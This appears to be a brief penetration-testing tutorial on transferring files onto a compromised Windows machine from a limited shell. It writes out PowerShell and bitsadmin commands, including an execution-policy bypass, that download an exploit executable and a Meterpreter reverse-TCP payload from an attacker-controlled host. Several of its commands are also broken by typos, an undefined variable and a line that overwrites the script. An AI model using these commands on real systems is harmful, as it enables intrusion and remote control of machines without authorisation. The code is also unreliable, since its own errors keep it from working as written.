Assumptions:
1) You got access on the windows system which support the Powershell and Bitsadmin
Please note that bitsadmin is no logger supported on the windows, instead of bitsadmin we can use the powershell.

Execute the following command on the target machine's limited shell


echo $storageDir = $pwd > wget.ps1
echo $webclient = New-Object System.Net.WebClient >>wget.ps1
echo $url = "http://192.168.0.1/winExp.exe" >>wget.ps1
echo $webliclient.DownloadFile($url, $file) >>wget.ps1
echo $storageDir = $pwd > wget.ps1

Now, our wget.ps1 is ready for action i.e. now it should help attacker to transfer the exploit on the target windows machine.

you can cross verify the wget.ps1 using
TYPE command.

Now lets download file the using below given power-shell command.


powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1

In some other cases some of the lower version of the windows doesn't support powershell. In this case you can use the bitsadmin utility to download the file in the target machine's directory.


bitsadmin /transfer myDownloadJob http://192.168.0.1/winExp.exe c:\Users\g4h\Desktop1.exe

There is another oneliner file downloader in Powershell :


$storageDir = $pwd $webclient = New-Object System.Net.WebClient $url = "http://192.168.0.1/met_revtcp_38_443.exe" $file = "met.exe" $webclient.DownloadFile($url,$file)